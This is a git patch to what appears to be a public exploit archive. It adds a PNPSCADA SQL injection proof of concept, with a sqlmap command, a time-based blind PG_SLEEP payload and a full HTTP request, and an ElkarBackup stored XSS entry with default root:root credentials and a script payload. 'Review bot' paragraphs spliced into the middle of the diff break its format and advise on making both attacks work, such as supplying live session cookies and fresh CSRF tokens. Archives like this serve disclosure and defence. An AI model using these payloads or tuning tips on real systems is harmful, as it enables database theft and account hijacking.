From caf6833937b06aa55aeaa999f488257fa45b0a83 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 21 Aug 2020 05:01:48 +0000
Subject: [PATCH] DB: 2020-08-21

2 changes to exploits/shellcodes

ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
---
 exploits/hardware/webapps/48757.txt | 57 +++++++++++++++++++++++++++++
 exploits/php/webapps/48756.txt | 40 ++++++++++++++++++++
 files_exploits.csv | 2 +
 3 files changed, 99 insertions(+)
 create mode 100644 exploits/hardware/webapps/48757.txt
 create mode 100644 exploits/php/webapps/48756.txt

diff --git a/exploits/hardware/webapps/48757.txt b/exploits/hardware/webapps/48757.txt
new file mode 100644
index 000000000..0802fe7d1
--- /dev/null
+++ b/exploits/hardware/webapps/48757.txt
@@ -0,0 +1,57 @@
+# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
+# Google Dork: -
+# Date: 2020-08-17
+# Exploit Author: İsmail ERKEK
+# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
+# Version: 2.200816204020
+# Tested on: -
+
+
+1. Description:
+----------------------
+
+PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in
+/browse.jsp. Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from one of the affected pages with
+'interf' parameter and save it like fuel.req Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent
+
+3. Example payload:
+----------------------
+
+(time-based blind)
+
+memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
+6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831
+
+4. Burpsuite request:
+----------------------
+
+POST /browse.jsp HTTP/1.1
+Host: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
+Trident/5.0)
+Connection: close
+Referer:
+http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 93
+Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37
+
+memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831
+
+
+
+Best Regards.
+Ek alanı
\ No newline at end of file
diff --git a/exploits/php/webapps/48756.txt b/exploits/php/webapps/48756.txt
new file mode 100644
index 000000000..ca34b20d6
--- /dev/null
+++ b/exploits/php/webapps/48756.txt
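Review bot: The PoC section tells the reader to save the intercepted request as `fuel.req`, but the sqlmap command on the next line reads `req-pnp-browse.txt`, so the two steps do not line up; use one name, e.g. `'interf' parameter and save it as req-pnp-browse.txt. Then run SQLmap to extract the`. The Burp request in section 4 carries `searchStr=*` and `interf=115*`, which are sqlmap injection-point markers rather than values the application sent, and a line such as `# '*' marks the injection points for sqlmap -r` would stop it reading as a malformed capture. The example payload relies on `PG_SLEEP(5)`, which only works against a PostgreSQL backend; saying so explicitly (and passing `--dbms=postgresql` to sqlmap) would spare readers a blind `--level=5` scan. Since the issue is authenticated, the `Cookie:` line is a sample session and a live `JSESSIONID` must be substituted.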
@@ -0,0 +1,40 @@
+# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
+# Date: 2020-08-14
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://www.elkarbackup.org/
+# Version: 1.3.3
+# Tested on: Linux
+
+1- Go to following url. >> http://(HOST)/elkarbackup/login
+2- Default username and password is root:root. We must know login credentials.
+3- Go to "Jobs" and press "Add client" button.
+4- Write XSS payload in "Name" section.
+5- Press "Save" button.
+
+(( Executable XSS Payloads ))
+
+1- ">
+2- ">
+3- ">
+4- ">
+
+
+(( REQUEST ))
+
+POST /elkarbackup/client/2 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://(HOST)/elkarbackup/client/2
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 358
+Connection: close
+Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2
+Upgrade-Insecure-Requests: 1
+
+Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&
+Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&
+Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&
+Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 86e76fefb..493c5d106
--- a/files_exploits.csv
+++ b/files_exploits.csv
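Review bot: The write-up never says where the stored `Client[name]` is rendered unescaped, so a reader cannot tell which page to load to trigger the payload; a persistent-XSS entry should name the view, e.g. `6- Open the "Jobs" page again; the client name is rendered without encoding and the script executes.` (presumably the client list — confirm). The steps say "Add client", but the captured request is `POST /elkarbackup/client/2`, i.e. an edit of an existing client with id 2, and the steps and the request should agree. The body includes `Client[_token]`, a per-session CSRF token, so the request cannot be replayed verbatim; a note that a fresh token must be captured from the form would help. As rendered here the four lines under (( Executable XSS Payloads )) carry only `">`; if the `<script>` tags were lost in transit, the URL-encoded body (`%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E`) is the authoritative payload.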
@@ -42996,3 +42996,5 @@ id,file,description,date,author,type,platform,port
 48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php,
 48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,
 48755,exploits/hardware/webapps/48755.txt,"Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal",2020-08-19,Tuygun,webapps,hardware,
+48756,exploits/php/webapps/48756.txt,"ElkarBackup 1.3.3 - Persistent Cross-Site Scripting",2020-08-20,"Enes Özeser",webapps,php,
+48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,